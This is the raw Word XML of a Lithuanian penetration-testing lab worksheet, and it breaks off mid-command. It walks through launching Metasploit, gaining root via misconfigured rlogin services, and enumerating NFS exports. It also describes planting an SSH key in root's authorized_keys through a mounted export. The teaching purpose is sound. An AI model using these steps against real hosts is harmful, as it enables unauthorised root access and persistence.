    <w:p w14:paraId="3D8B04AB" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Paleidimas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193EE160" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>#msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C58DDC5" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(arba paleidimas iš /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>opt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>mfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18408365" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DFD6F56" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Paieškos pvz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA5388A" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>sendmail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C7BE558" w14:textId="57D8E626" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="370212E7" w14:textId="77777777" w:rsidR="00BD6073" w:rsidRPr="00607DC0" w:rsidRDefault="00BD6073" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206A66A2" w14:textId="370F2E9C" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Paslaugos: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> pagrindai</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="2CF01AC3" w14:textId="03526CDF" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="123F7060" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TCP prieigos (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">) 512, 513 ir 514 yra žinomos kaip "r" tipo paslaugos, kurie buvo nesukonfigūruoti, leisti nuotolinę prieigą iš bet kurio kompiuterio (standartas ". </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>rhosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> + +" situacija). Norėdami pasinaudoti šia klaida, įsitikinkite, kad "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>rsh-client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>" klientas yra įdiegtas (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">) ir paleiskite šią komandą, kaip lokalų </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. Jei gavote pranešimą įvesti SSH raktą, tai reiškia, kad </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>rsh-client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> įrankiai nebuvo įdiegti ir </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> naudoja SSH pagal nutylėjimą. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C6DBEF" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F0171F" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>rlogin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B3DC0C" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Sekanti paslauga į kurį turėtume atkreipti dėmesį tai, Tinklo rinkmenų sistemos (NFS). NFS gali būti identifikuojamas pagal prieigą (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">) 2049 tiesiogiai arba užklausiant </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>portmapper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> paslaugos. Toliau naudojant </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>rpcinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> nustatyti NFS ir </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>showmount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e nustatyti ar "/" prieigos dalį (failų sistemos šakninė direktorija) yra eksportuojama. Jums reikės </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>rpcbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>nfs-common</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> paketų (įrankių).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0DA5C1" w14:textId="6A4A5069" w:rsidR="00CC09C3" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FFBB5B8" w14:textId="569E7DBD" w:rsidR="00607DC0" w:rsidRPr="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Jūsų gautas rezultatas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C3BD84" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRPr="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pP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CC09C3" w:rsidRPr="00607DC0" w14:paraId="72A4C101" w14:textId="77777777" w:rsidTr="00CC09C3">
        <w:trPr>
          <w:trHeight w:val="368"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="668860EB" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3"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IP adresas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18FB1015" w14:textId="10DB3BF6" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00C77619"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CC09C3" w:rsidRPr="00607DC0" w14:paraId="78DD71AD" w14:textId="77777777" w:rsidTr="00CC09C3">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="358D393A" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3"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05D93546" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w14:paraId="6BD3A464" w14:textId="77777777" w:rsidTr="00CC09C3">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="625F0357" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3"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7210066E" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D0F53E0" w14:textId="4715AE13" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25C3E080" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F9CBE73" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>rpcinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B42F361" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>showmount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327FB385" w14:textId="34C224C0" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pP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C77619" w:rsidRPr="00607DC0" w14:paraId="193C3C4C"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465D1FA2" w14:textId="77777777" w:rsidR="00C77619" w:rsidRPr="00607DC0" w:rsidRDefault="00C77619"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IP adresas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7D935BF8" w14:textId="77777777" w:rsidR="00C77619" w:rsidRPr="00607DC0" w:rsidRDefault="00C77619"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C77619" w:rsidRPr="00607DC0" w14:paraId="1CF4AC17" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="36E1E52F" w14:textId="77777777" w:rsidR="00C77619" w:rsidRPr="00607DC0" w:rsidRDefault="00C77619"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1322110C" w14:textId="77777777" w:rsidR="00C77619" w:rsidRPr="00607DC0" w:rsidRDefault="00C77619" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77619" w:rsidRPr="00607DC0" w14:paraId="6962A9D3" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="717AA0B4" w14:textId="77777777" w:rsidR="00C77619" w:rsidRPr="00607DC0" w:rsidRDefault="00C77619"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08741BFF" w14:textId="77777777" w:rsidR="00C77619" w:rsidRPr="00607DC0" w:rsidRDefault="00C77619" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1708A595" w14:textId="41C4F1B6" w:rsidR="00C77619" w:rsidRPr="00607DC0" w:rsidRDefault="00C77619" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B79AFE1" w14:textId="77777777" w:rsidR="00C77619" w:rsidRPr="00607DC0" w:rsidRDefault="00C77619" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6816C2A4" w14:textId="5BFE25E9" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Tam, kad gauti prieigą prie sistemos su įrašymo teisę į failų sistemą reikia (dėl SSH veikiančios paslaugos) sukurti naują SSH raktą mūsų puolamoje sistemoje. Primontuoti NFS eksportą ir pridėti savo raktą į </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00876D9A" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>naudot</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ojo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> failą (susikurti raktus):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C35F8CD" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D96A78A" w14:textId="7A752441" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>root@li</w:t>
      </w:r>
